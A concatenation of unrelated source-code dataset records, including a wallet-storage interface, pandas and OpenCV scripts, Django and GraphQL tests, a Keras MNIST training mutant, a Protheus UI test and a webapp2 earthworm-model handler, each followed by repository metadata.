             "~tagName3": <str>, // string tag (will be stored un-encrypted)
             "~tagName4": <str>, // string tag (will be stored un-encrypted)
           }
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def update_wallet_record_value(self, type_: str, id_: str, value: str) -> None:
        """
        Update a non-secret wallet record value.

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param value: the new value of record
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def update_wallet_record_tags(self, type_: str, id_: str, tags: dict) -> None:
        """
        Replace the tags of a non-secret wallet record.

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param tags: the record tags used for search and storing meta information as json:
           {
             "tagName1": <str>, // string tag (will be stored encrypted)
             "tagName2": <str>, // string tag (will be stored encrypted)
             "~tagName3": <str>, // string tag (will be stored un-encrypted)
             "~tagName4": <str>, // string tag (will be stored un-encrypted)
           }
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def add_wallet_record_tags(self, type_: str, id_: str, tags: dict) -> None:
        """
        Add new tags to the wallet record.

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param tags: the record tags used for search and storing meta information as json:
           {
             "tagName1": <str>, // string tag (will be stored encrypted)
             "tagName2": <str>, // string tag (will be stored encrypted)
             "~tagName3": <str>, // string tag (will be stored un-encrypted)
             "~tagName4": <str>, // string tag (will be stored un-encrypted)
           }
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def delete_wallet_record_tags(self, type_: str, id_: str, tag_names: List[str]) -> None:
        """
        Remove tags from the wallet record.

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param tag_names: the list of tag names to remove from the record as json array: ["tagName1", "tagName2", ...]
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def delete_wallet_record(self, type_: str, id_: str) -> None:
        """
        Delete an existing wallet record in the wallet.

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def get_wallet_record(self, type_: str, id_: str, options: RetrieveRecordOptions) -> Optional[dict]:
        """
        Get a wallet record by id.

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param options:
          {
            retrieveType: (optional, false by default) Retrieve record type,
            retrieveValue: (optional, true by default) Retrieve record value,
            retrieveTags: (optional, true by default) Retrieve record tags
          }
        :return: wallet record json:
         {
           id: "Some id",
           type: "Some type", // present only if retrieveType set to true
           value: "Some value", // present only if retrieveValue set to true
           tags: <tags json>, // present only if retrieveTags set to true
         }
        """
        raise NotImplementedError

    @abstractmethod
    async def wallet_search(self, type_: str, query: dict, options: RetrieveRecordOptions, limit: int=1) -> (List[dict],int):
        """
        Search for wallet records.

        :param type_: allows to separate different record types collections
        :param query: MongoDB style query to wallet record tags:
          {
            "tagName": "tagValue",
            $or: {
              "tagName2": { $regex: 'pattern' },
              "tagName3": { $gte: '123' },
            },
          }
        :param options:
          {
            retrieveRecords: (optional, true by default) If false only "counts" will be calculated,
            retrieveTotalCount: (optional, false by default) Calculate total count,
            retrieveType: (optional, false by default) Retrieve record type,
            retrieveValue: (optional, true by default) Retrieve record value,
            retrieveTags: (optional, true by default) Retrieve record tags,
          }
        :param limit: max record count to retrieve
        :return: wallet records json:
         {
           totalCount: <str>, // present only if retrieveTotalCount set to true
           records: [{ // present only if retrieveRecords set to true
               id: "Some id",
               type: "Some type", // present only if retrieveType set to true
               value: "Some value", // present only if retrieveValue set to true
               tags: <tags json>, // present only if retrieveTags set to true
           }],
         }
        """
        raise NotImplementedError
| [
"minikspb@gmail.com"
] | minikspb@gmail.com |
33f0a35f5feb7df1dd4eaeaba4f463974e6e5c27 | 1d60c5a7b8ce6277bff514e376f79848f706344c | /Data Engineer with Python/02. Streamlined Data Ingestion with pandas/03. Importing Data from Databases/02. Load entire tables.py | 87520ffcb0f8e37e20dcee08416d6f66edf13411 | [] | no_license | DidiMilikina/DataCamp | 338c6e6d3b4f5b6c541c1aba155a36e9ee24949d | 3bf2cf3c1430190a7f8e54efda7d50a5fd66f244 | refs/heads/master | 2020-12-15T13:16:54.178967 | 2020-05-06T17:30:54 | 2020-05-06T17:30:54 | 235,113,616 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | '''
Load entire tables
In the last exercise, you saw that data.db has two tables. weather has historical weather data for New York City. hpd311calls is a subset of call records made to the city's 311 help line about housing issues.
In this exercise, you'll use the read_sql() function in pandas to load both tables. read_sql() accepts a string of either a SQL query to run, or a table to load. It also needs a way to connect to the database, like the engine in the provided code.
Instructions 1/2
50 XP
1
Use read_sql() to load the hpd311calls table by name, without any SQL.
2
Use read_sql() and a SELECT * ... SQL query to load the entire weather table.
'''
SOLUTION
1
# Load libraries
import pandas as pd
from sqlalchemy import create_engine
# Create the database engine
engine = create_engine('sqlite:///data.db')
# Load hpd311calls without any SQL
hpd_calls = pd.read_sql('hpd311calls', engine)
# View the first few rows of data
print(hpd_calls.head())
2
# Create the database engine
engine = create_engine("sqlite:///data.db")
# Create a SQL query to load the entire weather table
query = """
SELECT *
FROM weather;
"""
# Load weather with the SQL query
weather = pd.read_sql(query, engine)
# View the first few rows of data
print(weather.head()) | [
"didimilikina8@gmail.com"
] | didimilikina8@gmail.com |
ae630ac12f733e37781b6ebbc2773032c9f2cac5 | 88863cb16f35cd479d43f2e7852d20064daa0c89 | /DraperImageChronology/src/inv-hist-match.py | 5bc7b4f8af190bf3b43f08c71c04caa2a975ea03 | [] | no_license | chrishefele/kaggle-sample-code | 842c3cd766003f3b8257fddc4d61b919e87526c4 | 1c04e859c7376f8757b011ed5a9a1f455bd598b9 | refs/heads/master | 2020-12-29T12:18:09.957285 | 2020-12-22T20:16:35 | 2020-12-22T20:16:35 | 238,604,678 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 853 | py |
# invert histogram matching on an image
import cv2
import sys
import numpy
MAX = 255
MIN = 0
# Input and output image paths come from the command line.
f_in = sys.argv[1]
f_out = sys.argv[2]
img_in = cv2.imread(f_in)
img_out = numpy.zeros_like(img_in)
RGB = (0,1,2)
# For each channel, build a lookup table that remaps the *occupied*
# intensity levels to consecutive values radiating out from the channel
# mean — compacting a previously spread (histogram-matched) histogram.
for chan in RGB:
    mean = img_in[:,:,chan].mean()
    hist = cv2.calcHist([img_in], [chan], None, [256], [0,256])
    hist = hist.flatten().astype(int)
    lut = numpy.zeros_like(hist)
    # Walk upward from the mean: each occupied bin gets the next level.
    ptr = int(mean)
    for i in range(int(mean), MAX+1, 1):
        if hist[i] > 0:
            lut[i] = ptr
            ptr += 1
    # Walk downward from just below the mean.
    # NOTE(review): the range end is exclusive, so bin 0 is never visited
    # and keeps lut[0] == 0 — confirm that is intended.
    ptr = int(mean)-1
    for i in range(int(mean)-1, MIN, -1):
        if hist[i] > 0:
            lut[i] = ptr
            ptr -= 1
    img_out[:,:,chan] = lut[ img_in[:,:,chan] ]
    print "channel:", chan, "mean:", mean
    print "hist:", hist
    print "lut:", lut
    print
cv2.imwrite(f_out, img_out)
| [
"c.hefele@verizon.net"
] | c.hefele@verizon.net |
9946676665a43725bcf984b91c4ab8323c8ddfe2 | d62cbada00caf2f7784066014a87e18052d6fa9f | /darksite/functional_tests/blog/test_list_posts.py | b8bd85d1dfcf15b689e4663ee7234a073d6f17d6 | [
"MIT"
] | permissive | UNCDarkside/DarksiteAPI | d6653990bce6b78db78efc672fde2c0ff20e4597 | a4bc1f4adee7ecfba840ad45da22513f88acbbd0 | refs/heads/master | 2020-04-11T17:36:19.062963 | 2019-01-11T03:42:31 | 2019-01-11T03:42:31 | 161,967,336 | 0 | 0 | MIT | 2019-10-22T22:09:50 | 2018-12-16T04:23:27 | Python | UTF-8 | Python | false | false | 1,311 | py | from cms.blog import models
POST_LIST_QUERY = """
query {
posts {
author {
id
name
}
content
published
rendered
slug
title
updated
}
}
"""
def test_list_posts(api_client, post_factory):
    """
    Users should be able to query a list of blog posts through the
    GraphQL API.
    """
    # Given two posts already in the database...
    post_factory(content="# Post 1", title="Post 1")
    post_factory(content="# Post 2", title="Post 2")

    # ...the API should echo them back in serialized form.
    expected = [
        {
            "author": {
                "id": str(post.author.id),
                "name": post.author.name,
            },
            "content": post.content,
            "published": post.published.isoformat(),
            "rendered": post.rendered,
            "slug": post.slug,
            "title": post.title,
            "updated": post.updated.isoformat(),
        }
        for post in models.Post.objects.all()
    ]

    # Make the actual request and fail loudly on transport errors.
    response = api_client.query(POST_LIST_QUERY)
    response.raise_for_status()

    # Check content
    assert response.status_code == 200
    assert response.json() == {"data": {"posts": expected}}
| [
"chathan@driehuys.com"
] | chathan@driehuys.com |
76c7e9f6bb07b3cce7f96db7880426f1f4f29e45 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_pursing.py | 97ccd6b1d0f43869691995232bdae3346650ddd4 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py |
from xai.brain.wordbase.nouns._purse import _PURSE
#calss header
class _PURSING(_PURSE, ):
def __init__(self,):
_PURSE.__init__(self)
self.name = "PURSING"
self.specie = 'nouns'
self.basic = "purse"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
2c3ea8b81536b7c933e4b3a416923e9b9f6d2579 | cbedb18df0aaac810aeea87a2273edb15c1cf899 | /Strings/49. Group Anagrams (python string builder).py | 8b0bb59ac43006a54f171ca77f88aec37cd1619d | [] | no_license | kanglicheng/CodeBreakersCode | 71b833bb9f4c96d520c26f0044365dc62137a940 | 31f7f730227a0e10951e7468bad1b995cf2eafcb | refs/heads/master | 2023-08-07T20:32:05.267695 | 2020-09-14T14:36:25 | 2020-09-14T14:36:25 | 265,978,034 | 0 | 0 | null | 2020-05-22T00:05:29 | 2020-05-22T00:05:29 | null | UTF-8 | Python | false | false | 1,035 | py | # not sure about the solution at start
# sort each str => O(W logW), w is the length of each words -> O(N * W log W) or counting sort O(N*W)
# turn each word into count char list: each list length is fixed:26 -> need O(W) to turn to list
# but lst can't hash -> turn to str then use hash map
class Solution:
    def groupAnagrams(self, strs: List[str]) -> List[List[str]]:
        """Group the words of *strs* so that each group holds mutual anagrams.

        Each word is reduced to a 26-entry letter-count signature; words
        sharing the signature are anagrams.  Using a (hashable) tuple as
        the dict key avoids the original's per-word string building, and
        the whole pass is O(N * W) — no per-word sort needed.

        :param strs: words consisting of lowercase ASCII letters
        :return: list of groups, preserving first-seen order
        """
        groups = {}
        for word in strs:
            counts = [0] * 26
            for ch in word:
                counts[ord(ch) - ord('a')] += 1
            # Lists are unhashable; freeze the signature into a tuple.
            key = tuple(counts)
            groups.setdefault(key, []).append(word)
        # dicts preserve insertion order, so groups come out in the order
        # their first member appeared.
        return list(groups.values())
| [
"56766457+Wei-LiHuang@users.noreply.github.com"
] | 56766457+Wei-LiHuang@users.noreply.github.com |
70573600e0f7e3bf2144f550ad7a28e7db17e2c2 | 5f5c052aa6a42e7492daf940c9561f5ce84ecb1c | /geatpy/demo/sentense_search/aimfuc.py | 68a6d1234a3b6ecaa5b0919fae9690a3c6b8f466 | [] | no_license | siuyincheung/geatpy | 8b343087c506cef39a7dc377a667ae9f1392acd4 | 48d41c8835004d9b0c36060881ed9cfb07483f1e | refs/heads/master | 2020-03-27T08:15:57.973576 | 2018-08-27T00:21:00 | 2018-08-27T00:21:00 | 146,237,904 | 1 | 0 | null | 2018-08-27T02:39:41 | 2018-08-27T02:39:41 | null | UTF-8 | Python | false | false | 327 | py | import numpy as np
def aimfuc(Phen):
    """Objective function: squared character-code distance to the target phrase.

    Each row of *Phen* is a candidate phrase encoded as character codes;
    the fitness is the sum of squared differences from "I am a little boy".
    """
    target = np.array([ord(ch) for ch in "I am a little boy"])
    # One squared-error sum per row (candidate).
    dist = np.sum((Phen - target) ** 2, axis=1)
    # geatpy expects a column vector of objective values.
    return dist.reshape(-1, 1)
| [
"jazzbin@geatpy.com"
] | jazzbin@geatpy.com |
7a59a1045aed4872467a495c9c8559d6cf22d43b | 716ed8ab9cbd61837fb116635c2d378b32eeb890 | /app/migrations/0004_auto_20180902_0447.py | 2f5b3abdde6abf5825fdd6216228555e3f33be87 | [] | no_license | koneb71/waterworks-django | 19dab148fc46f85e1be55b8440f40f5cf2ea29c6 | 0de58e43ab04348622933f98d79c7d4c109fcb85 | refs/heads/master | 2020-03-28T07:18:50.512581 | 2018-10-15T03:53:05 | 2018-10-15T03:53:05 | 147,893,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-09-02 12:47
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0003_auto_20180902_0447'),
]
operations = [
migrations.AlterField(
model_name='client',
name='account_number',
field=models.CharField(default=b'2018024753', max_length=30),
),
migrations.AlterField(
model_name='client',
name='meter_serial_number',
field=models.CharField(default=b'814296570', max_length=30),
),
migrations.AlterField(
model_name='collection',
name='created_date',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 9, 2, 4, 47, 53, 490427)),
),
migrations.AlterField(
model_name='collection',
name='due_date',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 10, 2, 4, 47, 53, 490458)),
),
]
| [
"koneb2013@gmail.com"
] | koneb2013@gmail.com |
9c01e7f694d285cbc82aed43b85433d7426fc179 | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/224/users/4363/codes/1596_2049.py | 2393618f22d551063f10e697c5ea26d03c3da23b | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # Teste seu codigo aos poucos.
# Nao teste tudo no final, pois fica mais dificil de identificar erros.
# Nao se intimide com as mensagens de erro. Elas ajudam a corrigir seu codigo.
x = int(input("dividendo "))
y = int(input("divisor "))
print(x)
print(y)
print(x//y)
print(x%y) | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
55c84f580c92d7a7645d5c9af2c759b950a7f84a | ac64fda7f1bfc92f7897efd60b8f3f0aeb22b4d7 | /syntactic_mutations/mnist_tr/mutants/mutant118.py | c11c9efb905c74722b9130a38af9dbfcb856ee71 | [] | no_license | dlfaults/mutation_operators_evaluation | ea7f33459ba7bcf7d70092d9db8b40f9b338d516 | 7d1ff30e901931a46bf8908e9bb05cae3daa5f0f | refs/heads/master | 2020-12-27T15:45:07.262012 | 2020-02-03T12:22:01 | 2020-02-03T12:22:01 | 237,955,342 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,611 | py | import datetime
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
now = datetime.datetime.now
batch_size = 128
num_classes = 5
epochs = 5
(img_rows, img_cols) = (28, 28)
filters = 32
pool_size = 2
kernel_size = 3
input_shape = (img_rows, img_cols, 1)
def train(model, train, test, num_classes, model_name):
x_train = train[0].reshape((train[0].shape[0],) + input_shape)
x_test = test[0].reshape((test[0].shape[0],) + input_shape)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
y_train = keras.utils.to_categorical(train[1], num_classes)
y_test = keras.utils.to_categorical(test[1], num_classes)
model.compile(loss='categorical_crossentropy', optimizer=\
'adadelta', metrics=\
['accuracy'])
model.fit(x_train, y_train, batch_size=\
batch_size, epochs=\
epochs, verbose=\
1, validation_data=\
(x_test, y_test))
model.save(model_name)
score = model.evaluate(x_test, y_test, verbose=0)
return (score[0], score[1])
def train_model(x_train, y_train, x_test, y_test, model1_name, model2_name):
x_train_lt5 = x_train[y_train < 5]
y_train_lt5 = y_train[y_train < 5]
x_test_lt5 = x_test[y_test < 5]
y_test_lt5 = y_test[y_test < 5]
x_train_gte5 = x_train[y_train >= 5]
y_train_gte5 = y_train[y_train >= 5] - 5
x_test_gte5 = x_test[y_test >= 5]
y_test_gte5 = y_test[y_test >= 5] - 5
feature_layers = [\
Conv2D(filters, kernel_size, padding=\
'valid', input_shape=\
input_shape), \
Activation('relu'), \
Conv2D(filters, kernel_size), \
Activation('relu'), \
MaxPooling2D(pool_size=pool_size), \
Dropout(0.25), \
Flatten()]
classification_layers = [\
Dense(128), \
Activation('relu'), \
Dropout(0.5), \
Dense(num_classes), \
Activation('softmax')]
model = Sequential(feature_layers + classification_layers)
(loss1, acc1) = train(model,
(x_train_lt5, y_train_lt5),
(x_test_lt5, y_test_lt5), num_classes, model1_name)
for l in feature_layers:
l.trainable = False
(loss2, acc2) = train(model,
(x_train_gte5, y_train_gte5),
(x_test_gte5, y_test_gte5), num_classes, model2_name)
pass | [
"gunel71@gmail.com"
] | gunel71@gmail.com |
870f58223b2bf1ea451ad5f430647e0c076b21c0 | 38c10c01007624cd2056884f25e0d6ab85442194 | /third_party/catapult/systrace/systrace/systrace_agent.py | 376d4f2507b0a8d04b8fa336d1c78567ee61812b | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0"
] | permissive | zenoalbisser/chromium | 6ecf37b6c030c84f1b26282bc4ef95769c62a9b2 | e71f21b9b4b9b839f5093301974a45545dad2691 | refs/heads/master | 2022-12-25T14:23:18.568575 | 2016-07-14T21:49:52 | 2016-07-23T08:02:51 | 63,980,627 | 0 | 2 | BSD-3-Clause | 2022-12-12T12:43:41 | 2016-07-22T20:14:04 | null | UTF-8 | Python | false | false | 1,647 | py | # Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class SystraceAgent(object):
  """Base class for systrace agents.

  An agent holds the command-line options and the trace categories to
  capture; each concrete subclass supplies its own tracing implementation.
  """

  def __init__(self, options, categories):
    """Store the command-line *options* and the *categories* to capture."""
    self._options = options
    self._categories = categories

  def start(self):
    """Begin tracing; subclasses must override."""
    raise NotImplementedError()

  def collect_result(self):
    """Block while collecting the result of tracing.

    Sync-mode agents read the data (e.g. from stdout) until it finishes;
    async-mode agents block until the agent is stopped and data is ready.
    """
    raise NotImplementedError()

  def expect_trace(self):
    """Return whether this agent will produce a trace.

    Determined during collect_result().
    """
    raise NotImplementedError()

  def get_trace_data(self):
    """Return the collected trace data."""
    raise NotImplementedError()

  def get_class_name(self):
    """Return the class name used to tag the trace type in the HTML output."""
    raise NotImplementedError()
| [
"zeno.albisser@hemispherian.com"
] | zeno.albisser@hemispherian.com |
49b046dd8aff3875402eaf5275f060f0b3b0174f | 1e6681ca2569c3de32db2d3b1c957652f8d8ccb3 | /xiaoqu_to_chart.py | f9b5ad6726ff6fff1cac6d9a26eed030e88e9e19 | [] | no_license | re0phimes/lianjia-beike-spider | d48e5bb05af9c8557ff32f9ca54746c4649d6281 | cb4ff13b6145c5169263e486e03d9fbca52450fe | refs/heads/master | 2020-04-02T17:21:11.770535 | 2018-10-24T23:42:44 | 2018-10-24T23:42:44 | 154,654,321 | 1 | 0 | null | 2018-10-25T10:45:10 | 2018-10-25T10:45:10 | null | UTF-8 | Python | false | false | 2,380 | py | #!/usr/bin/env python
# coding=utf-8
# author: zengyuetian
import webbrowser
import pandas as pd
import numpy as np
from pyecharts import Bar
import webbrowser as web
import os
import time
from lib.utility.version import PYTHON_3
if __name__ == '__main__':
    # Restart a simple static file server on port 8080 so the rendered
    # charts can be opened in a browser; failures are ignored deliberately
    # (best effort — the server may simply not have been running).
    try:
        if PYTHON_3:
            os.system("ps aux | grep python | grep http.server | grep -v grep | awk '{print $2}' | xargs kill")
            os.system("python -m http.server 8080 & > /dev/null 2>&1 ")
        else:
            os.system("ps aux | grep python | grep SimpleHTTPServer | grep -v grep | awk '{print $2}' | xargs kill")
            os.system("python -m SimpleHTTPServer 8080 & > /dev/null 2>&1 ")
    except Exception as e:
        pass
    # NOTE: the separator was converted to semicolons beforehand, because
    # some community (xiaoqu) names contain commas.
    df = pd.read_csv("xiaoqu.csv", encoding="utf-8", sep=";")
    # Print the total row count.
    print("row number is {0}".format(len(df.index)))
    # Filter out invalid rows whose price is 0.
    df = df[df.price > 0]
    # # Drop duplicated rows (disabled).
    # df = df.drop_duplicates()
    print("row number is {0}".format(len(df.index)))
    ####################################################
    # Ranking of the most expensive communities (xiaoqu)
    ####################################################
    df.sort_values("price", ascending=False, inplace=True)
    num = 3
    print(df.head(num))
    city = df["city_ch"][0]
    xqs = df["xiaoqu"][0:num]
    prices = df["price"][0:num]
    bar = Bar("{0}小区均价".format(city))
    bar.add("小区均价前{0}名".format(num), xqs, prices, is_stack=True, is_label_show=True)
    bar.render(path="xiaoqu.html")
    ####################################################
    # Ranking of district-level average prices
    ####################################################
    district_df = df.groupby('district').mean()
    district_df = district_df.round(0)
    district_df.sort_values("price", ascending=False, inplace=True)
    print(district_df)
    districts = district_df.index
    prices = district_df["price"]
    bar = Bar("{0}区县均价".format(city))
    bar.add("区县均价排名", districts, prices, is_stack=True, is_label_show=True)
    bar.render(path="district.html")
    web.open("http://localhost:8080/xiaoqu.html", new=0, autoraise=True)
    web.open("http://localhost:8080/district.html", new=0, autoraise=True)
    # Sleep so the browser has time to open the pages before exit.
    time.sleep(15)
| [
"ijumper@163.com"
] | ijumper@163.com |
55093be6c5bd69ff9bea241af4fdc6ab747a5870 | 3e0c57628c39e5042ed068451608a33b5edcf5df | /codex-py/test/config/demo_propmap.py | 69ec9605243caa7804fa759421b722ca3d5f7543 | [
"Apache-2.0"
] | permissive | egustafson/home-sensors | 5bd3c0f51be9a0a1f360ef41b45cbdfb3069286f | 232b36fe6fa2a2e3bce1391a91dffa192f17b835 | refs/heads/master | 2023-05-10T17:12:10.991008 | 2020-01-03T23:57:56 | 2020-01-03T23:57:56 | 141,070,153 | 0 | 0 | Apache-2.0 | 2023-05-01T20:20:24 | 2018-07-16T01:03:59 | Python | UTF-8 | Python | false | false | 1,030 | py | # -*- coding: utf-8 -*-
from codex.config.prop import PropMap
from codex.config.prop import PropList
tmap = { "k1": "v1",
"k2": "v2",
"k3": {"k3a": "v3a"},
"k4": {"k4a": {"k4b": "v3b"}},
# "k5": {"K$5": "v5a"},
# "k6.k6a": "v6a",
}
pmap = PropMap(tmap)
#print("tmap: {}".format(tmap))
#print("pmap: {}".format(pmap))
pmap.dump()
print("")
print("pmap is a {}".format(pmap.__class__))
print("pmap[k3] is a {}".format(pmap["k3"].__class__))
pmap["k9.k9a.k9b"] = "v9"
print("index k1: {}".format(pmap["k1"]))
# print("index kk: {}".format(pmap["kk"]))
print("index k3.k3a: {}".format(pmap["k3.k3a"]))
print("index k4.k4a.k4b: {}".format(pmap["k4.k4a.k4b"]))
try:
print("index k1: {}".format(pmap["k1"]))
except KeyError as ex:
print("ex: {}".format(ex))
print("pmap.items():")
for (k,v) in pmap.items():
print(" {}: {}".format(k, v))
print("pmap.flatten():")
flat = pmap.flatten()
for (k,v) in flat:
print(" {}: {}".format(k, v))
print("")
pmap.dump()
| [
"eg-git@elfwerks.org"
] | eg-git@elfwerks.org |
f7e67e7c06dad3c32e3885a4e2fbdb29ab4a0a3b | 7986ec6498e3f93967fa9bfe2b6a9d4056138293 | /Protheus_WebApp/Modules/SIGATMK/TMKA061TESTCASE.py | 7e8672d16dbf8b96c9b30b4da09dadec36a8bae0 | [
"MIT"
] | permissive | HelenaAdrignoli/tir-script-samples | 7d08973e30385551ef13df15e4410ac484554303 | bb4f4ab3a49f723216c93f66a4395e5aa328b846 | refs/heads/master | 2023-02-21T11:26:28.247316 | 2020-04-28T16:37:26 | 2020-04-28T16:37:26 | 257,304,757 | 0 | 0 | MIT | 2020-04-20T14:22:21 | 2020-04-20T14:22:20 | null | UTF-8 | Python | false | false | 2,189 | py | from tir import Webapp
import unittest
class TMKA061(unittest.TestCase):
    """TIR UI test for Protheus routine TMKA061 (telemarketing contact-list wizard)."""

    @classmethod
    def setUpClass(inst):
        # Log into the SIGATMK module and open routine TMKA061.
        inst.oHelper = Webapp()
        inst.oHelper.Setup('SIGATMK','13/04/2020','T1','D MG 01 ','13')
        inst.oHelper.Program('TMKA061')

    def test_TMKA061_001(self):
        """Drive the wizard end-to-end to create an open contact list, then assert success."""
        # Launch the wizard ("Assistente") from the Other Actions menu.
        self.oHelper.SetButton("Outras Ações","Assistente")
        self.oHelper.SetButton("OK")
        # Step: list type = contact list, domain = sales, entity = clients.
        self.oHelper.ClickLabel("Lista de Contato")
        self.oHelper.SetButton("Avançar")
        self.oHelper.ClickLabel("Vendas")
        self.oHelper.SetButton("Avançar")
        self.oHelper.ClickLabel("1 - Clientes")
        self.oHelper.SetButton("Avançar")
        # Filter parameters left blank to include everything.
        self.oHelper.SetValue("Data Ultima Compra ?", "")
        self.oHelper.SetValue("Data Ultima Visita ?", "")
        self.oHelper.SetButton("OK")
        # Detailed selection with contact-profile parameters.
        self.oHelper.ClickLabel("Detalhada")
        self.oHelper.SetButton("Avançar")
        self.oHelper.SetValue("Nível do Contato ?", "")
        self.oHelper.SetValue("Perfil do Contato ?", "Nao Avalia")
        self.oHelper.SetValue("Ligacões não executadas ?", "Nao Considera")
        self.oHelper.SetValue("A partir de quando ?", "31/12/2004")
        self.oHelper.SetValue("Ignora os dias da semana ?", "")
        self.oHelper.SetButton("OK")
        # Channel = voice, operation = Comercial 1, list mode = open list.
        self.oHelper.ClickLabel("Voz")
        self.oHelper.SetButton("Avançar")
        self.oHelper.ClickLabel("Comercial 1")
        self.oHelper.SetButton("Avançar")
        self.oHelper.ClickLabel("Lista Aberta")
        self.oHelper.SetButton("Avançar")
        # Name the list and cap the number of items.
        self.oHelper.SetValue("Nome Lista", "Lista Contatos Vendas- TIR")
        self.oHelper.SetValue("Servico SLA", "")
        self.oHelper.SetKey("TAB")
        self.oHelper.SetValue("Número máximo de Itens por Lista:", "000999")
        self.oHelper.SetButton("Avançar")
        self.oHelper.SetButton("Avançar")
        self.oHelper.SetButton("Avançar")
        # Finish the wizard, confirm, and assert the routine succeeded.
        self.oHelper.SetButton("Finalizar")
        self.oHelper.SetButton("Sim")
        self.oHelper.SetButton("OK")
        self.oHelper.AssertTrue()

    @classmethod
    def tearDownClass(inst):
        inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main() | [
"hadrignoli@gmail.com"
] | hadrignoli@gmail.com |
ac807123982efe2f51ec607a6061f29be805c9f8 | 8ffb0b95591bd82df42335315b9595274740aca4 | /models/earthworm/leftover/earthworm_output.py | e0acabafbc13c8fffc4c7805920a5d9629973909 | [] | no_license | batwalrus76/ubertool_eco | 507cf5ef5a0f91f3a36a03d26d80783c3b517e79 | ed2863e37ee6066ccdfafa20f6fec3ba4f75f2d1 | refs/heads/master | 2021-01-18T10:23:27.810117 | 2015-03-24T14:50:05 | 2015-03-24T14:50:05 | 32,412,353 | 0 | 0 | null | 2015-03-17T18:30:11 | 2015-03-17T18:30:10 | null | UTF-8 | Python | false | false | 2,473 | py | # -*- coding: utf-8 -*-
import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
import webapp2 as webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from uber import uber_lib
import numpy as np
import cgi
import cgitb
cgitb.enable()
from earthworm import earthworm_model, earthworm_tables
import sys
sys.path.append("../earthworm")
from uber import uber_lib
import rest_funcs
import logging
logger = logging.getLogger('earthworm')
class earthwormOutputPage(webapp.RequestHandler):
    """Handles POST requests: runs the earthworm model and renders the output page."""

    def post(self):
        """Parse the form inputs, run the model, and write the rendered HTML response."""
        form = cgi.FieldStorage()
        # Model inputs, all parsed as floats from the submitted form.
        k_ow = float(form.getvalue('k_ow'))
        l_f_e = float(form.getvalue('l_f_e'))
        c_s = float(form.getvalue('c_s'))
        k_d = float(form.getvalue('k_d'))
        p_s = float(form.getvalue('p_s'))
        c_w = float(form.getvalue('c_w'))
        m_w = float(form.getvalue('m_w'))
        p_e = float(form.getvalue('p_e'))
        earthworm_obj = earthworm_model.earthworm(True,True,k_ow,l_f_e,c_s,k_d,p_s,c_w,m_w,p_e)
        # logger.info(vars(earthworm_obj))
        # Use a context manager so the file handle is always closed (the
        # original leaked it).  NOTE(review): `x` is never used below —
        # TODO confirm whether this read can be removed entirely.
        with open('earthworm/earthworm_description.txt','r') as text_file:
            x = text_file.read()
        templatepath = os.path.dirname(__file__) + '/../templates/'
        ChkCookie = self.request.cookies.get("ubercookie")
        # Assemble the page from the shared uber templates plus the
        # model-specific result tables.
        html = uber_lib.SkinChk(ChkCookie, "Earthworm Output")
        html = html + template.render(templatepath + '02uberintroblock_wmodellinks.html', {'model':'earthworm','page':'output'})
        html = html + template.render (templatepath + '03ubertext_links_left.html', {})
        html = html + template.render(templatepath + '04uberoutput_start.html', {
                'model':'earthworm',
                'model_attributes':'Earthworm Output'})
        html = html + earthworm_tables.timestamp(earthworm_obj)
        html = html + earthworm_tables.table_all(earthworm_obj)
        html = html + template.render(templatepath + 'export.html', {})
        html = html + template.render(templatepath + '04uberoutput_end.html', {})
        html = html + template.render(templatepath + '06uberfooter.html', {'links': ''})
        # Persist the run before responding.
        rest_funcs.save_dic(html, earthworm_obj.__dict__, "earthworm", "single")
        self.response.out.write(html)
